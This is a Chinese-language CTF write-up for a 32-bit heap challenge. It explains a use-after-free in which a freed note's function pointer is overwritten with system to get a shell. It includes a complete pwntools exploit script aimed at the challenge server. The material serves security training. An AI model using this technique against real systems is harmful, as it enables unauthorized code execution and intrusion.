堆题,先看保护
32位,Partial RELRO,没pie关键信息就那么多,看ida
大致就是alloc创建堆块,free释放堆块,dump打印堆块内容
但是仔细看这三个函数就可以发现在实际运行中,会先创建一个存有free相关函数的地址和打印堆块内容相关函数的地址。
看delete函数并结合动态调试,可以知道释放堆块的过程实际上是调用先创造的12字节堆块的rec_str_free。那也就意味着无论那块地址存的是哪里的地址,我们在free堆块时他都会执行,并且题目给了我们system。注意,这里释放堆块之后并没有清除指向堆块的指针,也就是存在records数组的地址,所以我们可以利用这一漏洞修改12字节堆块中free的地址为system
解题思路:
由于free堆块没有清除records处的指针,所以可以利用uaf漏洞将某一堆块前的12字节堆块的rec_str_free修改为system,再填充bash参数getshell。(参数用b'sh\x00\x00'也行)
完整exp:
from pwn import*
context(log_level='debug')
#p=process('./n3')
p=remote('node5.buuoj.cn',27226)
system_plt=0x8048500
def intalloc(index,context):
p.sendlineafter(b'CNote >',str(1))
p.sendlineafter(b'Index',str(index))
p.sendlineafter(b'Type',str(1))
p.sendlineafter(b'Value >',context)
def alloc(index,size,context):
p.sendlineafter(b'CNote >',str(1))
p.sendlineafter(b'Index',str(index))
p.sendlineafter(b'Type',str(2))
p.sendlineafter(b'Length',str(size))
p.sendlineafter(b'Value >',context)#这里注意别把context给str了
def free(index):
p.sendlineafter(b'CNote >',str(2))
p.sendlineafter(b'Index',str(index))
def dump(index):
p.sendlineafter(b'CNote >',str(3))
p.sendlineafter(b'Index',str(index))
alloc(0,0x10,p8(0))
alloc(1,0x10,p8(0))
free(0)
free(1)
alloc(2,12,b'bash'+p32(system_plt))#这里会把堆块0,1对应的12字节堆块申请出来
free(0)
p.interactive()
补充点1:如果程序跳转执行12字节堆块rec_str_free没理解也可以看反汇编,大概可以理解为records[x+4](records[x]),这里对应了system和b'bash'。
补充点2:在这个exp下system的参数用/bin/sh没法getshell,因为参数需要占4个字节,如果多了或者少了的话后面的system地址没法正确填充。